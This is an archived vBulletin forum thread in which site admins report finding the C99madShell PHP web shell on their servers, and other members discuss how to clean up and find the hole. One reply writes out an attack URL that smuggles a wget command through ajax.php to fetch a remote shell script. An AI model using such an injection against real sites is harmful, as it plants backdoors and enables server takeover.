Go Back   vb.org Archive > Community Discussions > Forum and Server Management
Reload this Page C99madShell v. 2.0 madnet edition
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 2 1 2
 
Thread Tools Display Modes
  #1  
Old 01-21-2009, 02:04 AM
ryan.gottlieb ryan.gottlieb is offline
 
Join Date: Aug 2007
Location: Orlando, FL
Posts: 3
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default C99madShell v. 2.0 madnet edition
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....

--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] ---------------

solved.... error.php
Reply With Quote
  #2  
Old 01-21-2009, 03:04 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
Reply With Quote
  #3  
Old 01-27-2009, 01:33 AM
ryan.gottlieb ryan.gottlieb is offline
 
Join Date: Aug 2007
Location: Orlando, FL
Posts: 3
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
No, by SOLVED I meant I removed the script.. (The shell script)
Reply With Quote
  #4  
Old 01-27-2009, 02:58 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
That still does not solve how the attacker got the file there. Unless you know that already too?
Reply With Quote
  #5  
Old 08-23-2011, 10:50 AM
blowy blowy is offline
 
Join Date: Jun 2011
Posts: 15
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
am having this problem as well.....When I try to edit the payments manager I get the above msg

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13
Reply With Quote
  #6  
Old 08-24-2011, 03:56 AM
Marco64Th Marco64Th is offline
 
Join Date: Aug 2011
Posts: 34
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
Reply With Quote
  #7  
Old 08-24-2011, 02:01 PM
Crad Crad is offline
 
Join Date: Sep 2009
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Reply With Quote
  #8  
Old 08-24-2011, 03:06 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Crad View Post
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Tomato, Tomato or Potato, Potato it does not matter, it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter and tbo I have no clue why you even posted that last snippet of quick whit, nothing to cheer about until you've removed it :erm:.
Reply With Quote
  #9  
Old 08-24-2011, 06:27 PM
daydie's Avatar
daydie daydie is offline
 
Join Date: Oct 2007
Posts: 248
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap
Reply With Quote
  #10  
Old 08-25-2011, 02:51 AM
Marco64Th Marco64Th is offline
 
Join Date: Aug 2011
Posts: 34
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Crad View Post
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
A useless discussion on semantics in my view, the poster that asked the question will understand that it is a serious security issue if i use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?
Reply With Quote
Reply
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 03:57 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04080 seconds
  • Memory Usage 2,255KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete